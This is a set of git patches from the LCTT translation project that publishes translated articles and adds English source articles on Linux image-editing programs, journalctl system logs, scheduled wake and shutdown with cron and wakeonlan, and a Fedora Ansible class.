10:58:37 +0800 Subject: [PATCH 0143/1627] PUB:20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @wangy325 文章发布地址:https://linux.cn/article-9101-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/wangy325 加油! --- ...Source Cloud Skills and Certification Are Key for SysAdmins.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md (100%) diff --git a/translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md similarity index 100% rename from translated/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md rename to published/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md From e0b5229535a60623ffedaca21d3373986985874c Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 3 Dec 2017 11:02:11 +0800 Subject: [PATCH 0144/1627] PUB:20171130 Search DuckDuckGo from the Command Line.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yixunx 文章发布地址:https://linux.cn/article-9102-1.html 你的 LCTT 专页地址:https://linux.cn/lctt/yixunx 加油! --- .../20171130 Search DuckDuckGo from the Command Line.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171130 Search DuckDuckGo from the Command Line.md (100%) diff --git a/translated/tech/20171130 Search DuckDuckGo from the Command Line.md b/published/20171130 Search DuckDuckGo from the Command Line.md similarity index 100% rename from translated/tech/20171130 Search DuckDuckGo from the Command Line.md rename to published/20171130 Search DuckDuckGo from the Command Line.md From 6770d4998854417e2f9da6727fef1ac37b9610f3 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 3 Dec 2017 11:09:26 +0800 Subject: [PATCH 0145/1627] update author info --- ...30 Excellent Business Software Alternatives For Linux.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md b/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md index 2ef0571fdb..3469c62569 100644 --- a/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md +++ b/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md @@ -95,15 +95,15 @@ Now you have all the right information; it's time to weigh all the pros and cons -------------------------------------------------------------------------------- -via: linuxblog.darkduck.com/2017/11/excellent-business-software.html +via: http://linuxblog.darkduck.com/2017/11/excellent-business-software.html -作者:[ ][a] +作者:[DarkDuck][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 -[a]:linuxblog.darkduck.com/2017/11/excellent-business-software.html +[a]:http://linuxblog.darkduck.com/ [1]:http://linuxblog.darkduck.com/2015/08/pivot-tables-in-libreoffice-calc.html [3]:https://4.bp.blogspot.com/-xwLuDRdB6sw/Whxx0Z5pI5I/AAAAAAAADhU/YWHID8GU9AgrXRfeTz4HcDZkG-XWZNbSgCLcBGAs/s1600/4444061098_6eeaa7dc1a_z.jpg [4]:https://www.linkedin.com/pulse/benefits-using-microsoft-word-fareed/ From 42316e9e7e284bd3d089bb3a7b419d1e8247ab3c Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 3 Dec 2017 11:15:36 +0800 Subject: [PATCH 0146/1627] PRF&PUB:20171029 A block layer introduction part 1 the bio layer.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @geekpi 已发布: https://linux.cn/article-9103-1.html @oska874 为什么会有这么一篇没头没尾的文章? --- ...block layer introduction part 1 the bio layer.md | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) rename {translated/tech => published}/20171029 A block layer introduction part 1 the bio layer.md (95%) diff --git a/translated/tech/20171029 A block layer introduction part 1 the bio layer.md b/published/20171029 A block layer introduction part 1 the bio layer.md similarity index 95% rename from translated/tech/20171029 A block layer introduction part 1 the bio layer.md rename to published/20171029 A block layer introduction part 1 the bio layer.md index bc3f582259..96374c2302 100644 --- a/translated/tech/20171029 A block layer introduction part 1 the bio layer.md +++ b/published/20171029 A block layer introduction part 1 the bio layer.md @@ -1,4 +1,4 @@ -块层介绍第一部分:块 I/O 层 +回复:块层介绍第一部分 - 块 I/O 层 ============================================================ ### 块层介绍第一部分:块 I/O 层 @@ -6,9 +6,14 @@ 回复:amarao 在[块层介绍第一部分:块 I/O 层][1] 中提的问题 先前的文章:[块层介绍第一部分:块 I/O 层][2] +![](https://static.lwn.net/images/2017/neil-blocklayer.png) + 嗨, + 你在这里描述的问题与块层不直接相关。这可能是一个驱动错误、可能是一个 SCSI 层错误,但绝对不是一个块层的问题。 + 不幸的是,报告针对 Linux 的错误是一件难事。有些开发者拒绝去看 bugzilla,有些开发者喜欢它,有些(像我这样)只能勉强地使用它。 + 另一种方法是发送电子邮件。为此,你需要选择正确的邮件列表,还有也许是正确的开发人员,当他们心情愉快,或者不是太忙或者不是假期时找到它们。有些人会努力回复所有,有些是完全不可预知的 - 这对我来说通常会发送一个补丁,包含一些错误报告。如果你只是有一个你自己几乎都不了解的 bug,那么你的预期响应率可能会更低。很遗憾,但这是是真的。 许多 bug 都会得到回应和处理,但很多 bug 都没有。 @@ -16,18 +21,20 @@ 我不认为说没有人关心是公平的,但是没有人认为它如你想的那样重要是有可能的。如果你想要一个解决方案,那么你需要驱动它。一个驱动它的方法是花钱请顾问或者与经销商签订支持合同。我怀疑你的情况没有上面的可能。另一种方法是了解代码如何工作,并自己找到解决方案。很多人都这么做,但是这对你来说可能不是一种选择。另一种方法是在不同的相关论坛上不断提出问题,直到得到回复。坚持可以见效。你需要做好准备去执行任何你所要求的测试,可能包括建立一个新的内核来测试。 如果你能在最近的内核(4.12 或者更新)上复现这个 bug,我建议你邮件报告给 linux-kernel@vger.kernel.org、linux-scsi@vger.kernel.org 和我(neilb@suse.com)(注意你不必订阅这些列表来发送邮件,只需要发送就行)。描述你的硬件以及如何触发问题的。 + 包含所有进程状态是 “D” 的栈追踪。你可以用 “cat /proc/$PID/stack” 来得到它,这里的 “$PID” 是进程的 pid。 确保避免抱怨或者说这个已经坏了好几年了以及这是多么严重不足。没有人关心这个。我们关心的是 bug 以及如何修复它。因此只要报告相关的事实就行。 + 尝试在邮件中而不是链接到其他地方的链接中包含所有事实。有时链接是需要的,但是对于你的脚本,它只有 8 行,所以把它包含在邮件中就行(并避免像 “fuckup” 之类的描述。只需称它为“坏的”(broken)或者类似的)。同样确保你的邮件发送的不是 HTML 格式。我们喜欢纯文本。HTML 被所有的 @vger.kernel.org 邮件列表拒绝。你或许需要配置你的邮箱程序不发送 HTML。 -------------------------------------------------------------------------------- via: https://lwn.net/Articles/737655/ -作者:[ neilbrown][a] +作者:[neilbrown][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 8bd3b19ddb17c4157b3006320f882c04e2ae08bf Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Sun, 3 Dec 2017 11:39:21 +0800 Subject: [PATCH 0147/1627] =?UTF-8?q?20171203=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ux Programs for Drawing and Image Editing.md | 130 +++++++++++++++++ ...stem Logs: Understand Your Linux System.md | 59 ++++++++ ...ke up and Shut Down Linux Automatically.md | 132 ++++++++++++++++++ ...1 Fedora Classroom Session: Ansible 101.md | 71 ++++++++++ 4 files changed, 392 insertions(+) create mode 100644 sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md create mode 100644 sources/tech/20171117 System Logs: Understand Your Linux System.md create mode 100644 sources/tech/20171130 Wake up and Shut Down Linux Automatically.md create mode 100644 sources/tech/20171201 Fedora Classroom Session: Ansible 101.md diff --git a/sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md b/sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md new file mode 100644 index 0000000000..c6c50d9b25 --- /dev/null +++ b/sources/tech/20171116 Unleash Your Creativity – Linux Programs for Drawing and Image Editing.md @@ -0,0 +1,130 @@ +### Unleash Your Creativity – Linux Programs for Drawing and Image Editing + + By: [chabowski][1] + +The following article is part of a series of articles that provide tips and tricks for Linux newbies – or Desktop users that are not yet experienced with regard to certain topics. This series intends to complement the special edition #30 “[Getting Started with Linux][2]” based on [openSUSE Leap][3], recently published by the [Linux Magazine,][4] with valuable additional information. + +![](https://www.suse.com/communities/blog/files/2017/11/DougDeMaio-450x450.jpeg) + +This article has been contributed by Douglas DeMaio, openSUSE PR Expert at SUSE. + +Both Mac OS or Window offer several popular programs for graphics editing, vector drawing and creating and manipulating Portable Document Format (PDF). The good news: users familiar with the Adobe Suite can transition with ease to free, open-source programs available on Linux. + +Programs like [GIMP][5], [InkScape][6] and [Okular][7] are cross platform programs that are available by default in Linux/GNU distributions and are persuasive alternatives to expensive Adobe programs like [Photoshop][8], [Illustrator][9] and [Acrobat][10]. + +These creativity programs on Linux distributions are just as powerful as those for macOS or Window. This article will explain some of the differences and how the programs can be used to make your transition to Linux comfortable. + +### Krita + +The KDE desktop environment comes with tons of cool applications. [Krita][11] is a professional open source painting program. It gives users the freedom to create any artistic image they desire. Krita features tools that are much more extensive than the tool sets of most proprietary programs you might be familiar with. From creating textures to comics, Krita is a must have application for Linux users. + +![](https://www.suse.com/communities/blog/files/2017/11/krita-450x267.png) + +### GIMP + +GNU Image Manipulation Program (GIMP) is a cross-platform image editor. Users of Photoshop will find the User Interface of GIMP to be similar to that of Photoshop. The drop down menu offers colors, layers, filters and tools to help the user with editing graphics. Rulers are located both horizontal and vertical and guide can be dragged across the screen to give exact measurements. The drop down menu gives tool options for resizing or cropping photos; adjustments can be made to the color balance, color levels, brightness and contrast as well as hue and saturation. + +![](https://www.suse.com/communities/blog/files/2017/11/gimp-450x281.png) + +There are multiple filters in GIMP to enhance or distort your images. Filters for artistic expression and animation are available and are more powerful tool options than those found in some proprietary applications. Gradients can be applied through additional layers and the Text Tool offers many fonts, which can be altered in shape and size through the Perspective Tool. + +The cloning tool works exactly like those in other graphics editors, so manipulating images is simple and acurrate given the selection of brush sizes to do the job. + +Perhaps one of the best options available with GIMP is that the images can be saved in a variety of formats like .jpg, .png, .pdf, .eps and .svg. These image options provide high-quality images in a small file. + +### InkScape + +Designing vector imagery with InkScape is simple and free. This cross platform allows for the creation of logos and illustrations that are highly scalable. Whether designing cartoons or creating images for branding, InkScape is a powerful application to get the job done. Like GIMP, InkScape lets you save files in various formats and allows for object manipulation like moving, rotating and skewing text and objects. Shape tools are available with InkScape so making stars, hexagons and other elements will meet the needs of your creative mind. + +![](https://www.suse.com/communities/blog/files/2017/11/inkscape-450x273.png) + +InkScape offers a comprehensive tool set, including a drawing tool, a pen tool and the freehand calligraphy tool that allows for object creation with your own personal style. The color selector gives you the choice of RGB, CMYK and RGBA – using specific colors for branding logos, icons and advertisement is definitely convincing. + +Short cut commands are similar to what users experience in Adobe Illustrator. Making layers and grouping or ungrouping the design elements can turn a blank page into a full-fledged image that can be used for designing technical diagrams for presentations, importing images into a multimedia program or for creating web graphics and software design. + +Inkscape can import vector graphics from multiple other programs. It can even import bitmap images. Inkscape is one of those cross platform, open-source programs that allow users to operate across different operating systems, no matter if they work with macOS, Windows or Linux. + +### Okular and LibreOffice + +LibreOffice, which is a free, open-source Office Suite, allows users to collaborate and interact with documents and important files on Linux, but also on macOS and Window. You can also create PDF files via LibreOffice, and LibreOffice Draw lets you view (and edit) PDF files as images. + +![](https://www.suse.com/communities/blog/files/2017/11/draw-450x273.png) + +However, the Portable Document Format (PDF) is quite different on the three Operating Systems. MacOS offers [Preview][12] by default; Windows has [Edge][13]. Of course, also Adobe Reader can be used for both MacOS and Window. With Linux, and especially the desktop selection of KDE, [Okular][14] is the default program for viewing PDF files. + +![](https://www.suse.com/communities/blog/files/2017/11/okular-450x273.png) + +The functionality of Okular supports different types of documents, like PDF, Postscript, [DjVu][15], [CHM][16], [XPS][17], [ePub][18] and others. Yet the universal document viewer also offers some powerful features that make interacting with a document different from other programs on MacOS and Windows. Okular gives selection and search tools that make accessing the text in PDFs fluid for how users interact with documents. Viewing documents with Okular is also accommodating with the magnification tool that allows for a quick look at small text in a document. + +Okular also provides users with the option to configure it to use more memory if the document is too large and freezes the Operating System. This functionality is convenient for users accessing high-quality print documents for example for advertising. + +For those who want to change locked images and documents, it’s rather easy to do so with LibreOffice Draw. A hypothetical situation would be to take a locked IRS (or tax) form and change it to make the uneditable document editable. Imagine how much fun it could be to transform it to some humorous kind of tax form … + +And indeed, the sky’s the limit on how creative a user wants to be when using programs that are available on Linux distributions. + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) + +( + + _**2** votes, average: **5.00** out of 5_ + +) + + _You need to be a registered member to rate this post._ + +Tags: [drawing][19], [Getting Started with Linux][20], [GIMP][21], [image editing][22], [Images][23], [InkScape][24], [KDE][25], [Krita][26], [Leap 42.3][27], [LibreOffice][28], [Linux Magazine][29], [Okular][30], [openSUSE][31], [PDF][32] Categories: [Desktop][33], [Expert Views][34], [LibreOffice][35], [openSUSE][36] + +-------------------------------------------------------------------------------- + +via: https://www.suse.com/communities/blog/unleash-creativity-linux-programs-drawing-image-editing/ + +作者:[chabowski ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.suse.com/communities/blog/author/chabowski/ +[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux +[3]:https://en.opensuse.org/Portal:42.3 +[4]:http://www.linux-magazine.com/ +[5]:https://www.gimp.org/ +[6]:https://inkscape.org/en/ +[7]:https://okular.kde.org/ +[8]:http://www.adobe.com/products/photoshop.html +[9]:http://www.adobe.com/products/illustrator.html +[10]:https://acrobat.adobe.com/us/en/acrobat/acrobat-pro-cc.html +[11]:https://krita.org/en/ +[12]:https://en.wikipedia.org/wiki/Preview_(macOS) +[13]:https://en.wikipedia.org/wiki/Microsoft_Edge +[14]:https://okular.kde.org/ +[15]:http://djvu.org/ +[16]:https://fileinfo.com/extension/chm +[17]:https://fileinfo.com/extension/xps +[18]:http://idpf.org/epub +[19]:https://www.suse.com/communities/blog/tag/drawing/ +[20]:https://www.suse.com/communities/blog/tag/getting-started-with-linux/ +[21]:https://www.suse.com/communities/blog/tag/gimp/ +[22]:https://www.suse.com/communities/blog/tag/image-editing/ +[23]:https://www.suse.com/communities/blog/tag/images/ +[24]:https://www.suse.com/communities/blog/tag/inkscape/ +[25]:https://www.suse.com/communities/blog/tag/kde/ +[26]:https://www.suse.com/communities/blog/tag/krita/ +[27]:https://www.suse.com/communities/blog/tag/leap-42-3/ +[28]:https://www.suse.com/communities/blog/tag/libreoffice/ +[29]:https://www.suse.com/communities/blog/tag/linux-magazine/ +[30]:https://www.suse.com/communities/blog/tag/okular/ +[31]:https://www.suse.com/communities/blog/tag/opensuse/ +[32]:https://www.suse.com/communities/blog/tag/pdf/ +[33]:https://www.suse.com/communities/blog/category/desktop/ +[34]:https://www.suse.com/communities/blog/category/expert-views/ +[35]:https://www.suse.com/communities/blog/category/libreoffice/ +[36]:https://www.suse.com/communities/blog/category/opensuse/ diff --git a/sources/tech/20171117 System Logs: Understand Your Linux System.md b/sources/tech/20171117 System Logs: Understand Your Linux System.md new file mode 100644 index 0000000000..0dcaa57925 --- /dev/null +++ b/sources/tech/20171117 System Logs: Understand Your Linux System.md @@ -0,0 +1,59 @@ +### System Logs: Understand Your Linux System + +![chabowski](https://www.suse.com/communities/blog/files/2016/03/chabowski_avatar_1457537819-100x100.jpg) + By: [chabowski][1] + +The following article is part of a series of articles that provide tips and tricks for Linux newbies – or Desktop users that are not yet experienced with regard to certain topics). This series intends to complement the special edition #30 “[Getting Started with Linux][2]” based on [openSUSE Leap][3], recently published by the [Linux Magazine,][4] with valuable additional information. + +This article has been contributed by Romeo S. Romeo is a PDX-based enterprise Linux professional specializing in scalable solutions for innovative corporations looking to disrupt the marketplace. + +System logs are incredibly important files in Linux. Special programs that run in the background (usually called daemons or servers) handle most of the tasks on your Linux system. Whenever these daemons do anything, they write the details of the task to a log file as a sort of “history” of what they’ve been up to. These daemons perform actions ranging from syncing your clock with an atomic clock to managing your network connection. All of this is written to log files so that if something goes wrong, you can look into the specific log file and see what happened. + +![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg) + +Photo by Markus Spiske on Unsplash + +There are many different logs on your Linux computer. Historically, they were mostly stored in the /var/log directory in a plain text format. Quite a few still are, and you can read them easily with the less pager. On your freshly installed openSUSE Leap 42.3 system, and on most modern systems, important logs are stored by the systemd init system. This is the system that handles starting up daemons and getting the computer ready for use on startup. The logs handled by systemd are stored in a binary format, which means that they take up less space and can more easily be viewed or exported in various formats, but the downside is that you need a special tool to view them. Luckily, this tool comes installed on your system: it’s called journalctl and by default, it records all of the logs from every daemon to one location. + +To take a look at your systemd log, just run the journalctl command. This will open up the combined logs in the less pager. To get a better idea of what you’re looking at, see a single log entry from journalctl here: + +``` +Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM. +``` + +This individual log entry contains (in order) the date and time of the entry, the hostname of the computer, the name of the process that logged the entry, the PID (process ID number) of the process that logged the entry, and then the log entry itself. + +If a program running on your system is misbehaving, look at the log file and search (with the “/” key followed by the search term) for the name of the program. Chances are that if the program is reporting errors that are causing it to malfunction, then the errors will show up in the system log. Sometimes errors are verbose enough for you to be able to fix them yourself. Other times, you have to search for a solution on the Web. Google is usually the most convenient search engine to use for weird Linux problems +![](https://www.suse.com/communities/blog/files/2017/09/Sunglasses_Emoji-450x450.png) +. However, be sure that you only enter the actual log entry, because the rest of the information at the beginning of the line (date, host name, PID) is unnecessary and could return false positives. + +After you search for the problem, the first few results are usually pages containing various things that you can try for solutions. Of course, you shouldn’t just follow random instructions that you find on the Internet: always be sure to do additional research into what exactly you will be doing and what the effects of it are before following any instructions. With that being said, the results for a specific entry from the system’s log file are usually much more useful than results from searching more generic terms that describe the malfunctioning of the program directly. This is because many different things could cause a program to misbehave, and multiple problems could cause identical misbehaviors. + +For example, a lack of audio on the system could be due to a massive amount of different reasons, ranging from speakers not being plugged in, to back end sound systems misbehaving, to a lack of the proper drivers. If you search for a general problem, you’re likely to see a lot of irrelevant solutions and you’ll end up wasting your time on a wild goose chase. With a specific search of an actual line from a log file, you can see other people who have had the same log entry. See Picture 1 and Picture 2 to compare and contrast between the two types of searching. + +![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png) + +Picture 1 shows generic, unspecific Google results for a general misbehavior of the system. This type of searching generally doesn’t help much. + +![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png) + +Picture 2 shows more specific, helpful Google results for a particular log file line. This type of searching is generally very helpful. + +There are some systems that log their actions outside of journalctl. The most important ones that you may find yourself dealing with on a desktop system are /var/log/zypper.log for openSUSE’s package manager, /var/log/boot.log for those messages that scroll by too fast to be read when you turn your system on, and /var/log/ntp if your Network Time Protocol Daemon is having troubles syncing time. One more important place to look for errors if you’re having problems with specific hardware is the Kernel Ring Buffer, which you can read by typing the dmesg -H command (this opens in the less pager as well). The Kernel Ring Buffer is stored in RAM, so you lose it when you reboot your system, but it contains important messages from the Linux kernel about important events, such as hardware being added, modules being loaded, or strange network errors. + +Hopefully you are prepared now to understand your Linux system better! Have a lot of fun! + +-------------------------------------------------------------------------------- + +via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/ + +作者:[chabowski] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.suse.com/communities/blog/author/chabowski/ +[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux +[3]:https://en.opensuse.org/Portal:42.3 +[4]:http://www.linux-magazine.com/ diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md new file mode 100644 index 0000000000..efb0937695 --- /dev/null +++ b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -0,0 +1,132 @@ +Wake up and Shut Down Linux Automatically +============================================================ + +### [banner.jpg][1] + +![time keeper](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner.jpg?itok=zItspoSb) + +Learn how to configure your Linux computers to watch the time for you, then wake up and shut down automatically. + +[Creative Commons Attribution][6][The Observatory at Delhi][7] + +Don't be a watt-waster. If your computers don't need to be on then shut them down. For convenience and nerd creds, you can configure your Linux computers to wake up and shut down automatically. + +### Precious Uptimes + +Some computers need to be on all the time, which is fine as long as it's not about satisfying an uptime compulsion. Some people are very proud of their lengthy uptimes, and now that we have kernel hot-patching that leaves only hardware failures requiring shutdowns. I think it's better to be practical. Save electricity as well as wear on your moving parts, and shut them down when they're not needed. For example, you can wake up a backup server at a scheduled time, run your backups, and then shut it down until it's time for the next backup. Or, you can configure your Internet gateway to be on only at certain times. Anything that doesn't need to be on all the time can be configured to turn on, do a job, and then shut down. + +### Sleepies + +For computers that don't need to be on all the time, good old cron will shut them down reliably. Use either root's cron, or /etc/crontab. This example creates a root cron job to shut down every night at 11:15 p.m. + +``` +# crontab -e -u root +# m h dom mon dow command +15 23 * * * /sbin/shutdown -h now +``` + +``` +15 23 * * 1-5 /sbin/shutdown -h now +``` + +You may also use /etc/crontab, which is fast and easy, and everything is in one file. You have to specify the user: + +``` +15 23 * * 1-5 root shutdown -h now +``` + +Auto-wakeups are very cool; most of my SUSE colleagues are in Nuremberg, so I am crawling out of bed at 5 a.m. to have a few hours of overlap with their schedules. My work computer turns itself on at 5:30 a.m., and then all I have to do is drag my coffee and myself to my desk to start work. It might not seem like pressing a power button is a big deal, but at that time of day every little thing looms large. + +Waking up your Linux PC can be less reliable than shutting it down, so you may want to try different methods. You can use wakeonlan, RTC wakeups, or your PC's BIOS to set scheduled wakeups. These all work because, when you power off your computer, it's not really all the way off; it is in an extremely low-power state and can receive and respond to signals. You need to use the power supply switch to turn it off completely. + +### BIOS Wakeup + +A BIOS wakeup is the most reliable. My system BIOS has an easy-to-use wakeup scheduler (Figure 1). Chances are yours does, too. Easy peasy. + +### [fig-1.png][2] + +![wake up](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_11.png?itok=8qAeqo1I) + +Figure 1: My system BIOS has an easy-to-use wakeup scheduler. + +[Used with permission][8] + +### wakeonlan + +wakeonlan is the next most reliable method. This requires sending a signal from a second computer to the computer you want to power on. You could use an Arduino or Raspberry Pi to send the wakeup signal, a Linux-based router, or any Linux PC. First, look in your system BIOS to see if wakeonlan is supported -- which it should be -- and then enable it, as it should be disabled by default. + +Then, you'll need an Ethernet network adapter that supports wakeonlan; wireless adapters won't work. You'll need to verify that your Ethernet card supports wakeonlan: + +``` +# ethtool eth0 | grep -i wake-on + Supports Wake-on: pumbg + Wake-on: g +``` + +* d -- all wake ups disabled + +* p -- wake up on physical activity + +* u -- wake up on unicast messages + +* m -- wake up on multicast messages + +* b -- wake up on broadcast messages + +* a -- wake up on ARP messages + +* g -- wake up on magic packet + +* s -- set the Secure On password for the magic packet + +man ethtool is not clear on what the p switch does; it suggests that any signal will cause a wake up. In my testing, however, it doesn't do that. The one that must be enabled is g -- wake up on magic packet, and the Wake-on line shows that it is already enabled. If it is not enabled, you can use ethtool to enable it, using your own device name, of course: + +``` +# ethtool -s eth0 wol g +``` + +``` +@reboot /usr/bin/ethtool -s eth0 wol g +``` + +### [fig-2.png][3] + +![wakeonlan](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_7.png?itok=XQAwmHoQ) + +Figure 2: Enable Wake on LAN. + +[Used with permission][9] + +Another option is recent Network Manager versions have a nice little checkbox to enable wakeonlan (Figure 2). + +There is a field for setting a password, but if your network interface doesn't support the Secure On password, it won't work. + +Now you need to configure a second PC to send the wakeup signal. You don't need root privileges, so create a cron job for your user. You need the MAC address of the network interface on the machine you're waking up: + +``` +30 08 * * * /usr/bin/wakeonlan D0:50:99:82:E7:2B +``` + +Using the real-time clock for wakeups is the least reliable method. Check out [Wake Up Linux With an RTC Alarm Clock][4]; this is a bit outdated as most distros use systemd now. Come back next week to learn more about updated ways to use RTC wakeups. + +Learn more about Linux through the free ["Introduction to Linux" ][5]course from The Linux Foundation and edX. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux-automatically + +作者:[Carla Schroder] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.linux.com/files/images/bannerjpg +[2]:https://www.linux.com/files/images/fig-1png-11 +[3]:https://www.linux.com/files/images/fig-2png-7 +[4]:https://www.linux.com/learn/wake-linux-rtc-alarm-clock +[5]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[6]:https://www.linux.com/licenses/category/creative-commons-attribution +[7]:http://www.columbia.edu/itc/mealac/pritchett/00routesdata/1700_1799/jaipur/delhijantarearly/delhijantarearly.html +[8]:https://www.linux.com/licenses/category/used-permission +[9]:https://www.linux.com/licenses/category/used-permission diff --git a/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md b/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md new file mode 100644 index 0000000000..a74b196663 --- /dev/null +++ b/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md @@ -0,0 +1,71 @@ +### [Fedora Classroom Session: Ansible 101][2] + +### By Sachin S Kamath + +![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) + +Fedora Classroom sessions continue this week with an Ansible session. The general schedule for sessions appears [on the wiki][3]. You can also find [resources and recordings from previous sessions][4] there. Here are details about this week’s session on [Thursday, 30th November at 1600 UTC][5]. That link allows you to convert the time to your timezone. + +### Topic: Ansible 101 + +As the Ansible [documentation][6] explains, Ansible is an IT automation tool. It’s primarily used to configure systems, deploy software, and orchestrate more advanced IT tasks. Examples include continuous deployments or zero downtime rolling updates. + +This Classroom session covers the topics listed below: + +1. Introduction to SSH + +2. Understanding different terminologies + +3. Introduction to Ansible + +4. Ansible installation and setup + +5. Establishing password-less connection + +6. Ad-hoc commands + +7. Managing inventory + +8. Playbooks examples + +There will also be a follow-up Ansible 102 session later. That session will cover complex playbooks, roles, dynamic inventory files, control flow and Galaxy. + +### Instructors + +We have two experienced instructors handling this session. + +[Geoffrey Marr][7], also known by his IRC name as “coremodule,” is a Red Hat employee and Fedora contributor with a background in Linux and cloud technologies. While working, he spends his time lurking in the [Fedora QA][8] wiki and test pages. Away from work, he enjoys RaspberryPi projects, especially those focusing on software-defined radio. + +[Vipul Siddharth][9] is an intern at Red Hat who also works on Fedora. He loves to contribute to open source and seeks opportunities to spread the word of free and open source software. + +### Joining the session + +This session takes place on [BlueJeans][10]. The following information will help you join the session: + +* URL: [https://bluejeans.com/3466040121][1] + +* Meeting ID (for Desktop App): 3466040121 + +We hope you attend, learn from, and enjoy this session! If you have any feedback about the sessions, have ideas for a new one or want to host a session, please feel free to comment on this post or edit the [Classroom wiki page][11]. + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/fedora-classroom-session-ansible-101/ + +作者:[Sachin S Kamath] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://bluejeans.com/3466040121 +[2]:https://fedoramagazine.org/fedora-classroom-session-ansible-101/ +[3]:https://fedoraproject.org/wiki/Classroom +[4]:https://fedoraproject.org/wiki/Classroom#Previous_Sessions +[5]:https://www.timeanddate.com/worldclock/fixedtime.html?msg=Fedora+Classroom+-+Ansible+101&iso=20171130T16&p1=%3A +[6]:http://docs.ansible.com/ansible/latest/index.html +[7]:https://fedoraproject.org/wiki/User:Coremodule +[8]:https://fedoraproject.org/wiki/QA +[9]:https://fedoraproject.org/wiki/User:Siddharthvipul1 +[10]:https://www.bluejeans.com/downloads +[11]:https://fedoraproject.org/wiki/Classroom From 21b6ea41aa8c7ca57f96f12d12bddf2d4cac40b6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: 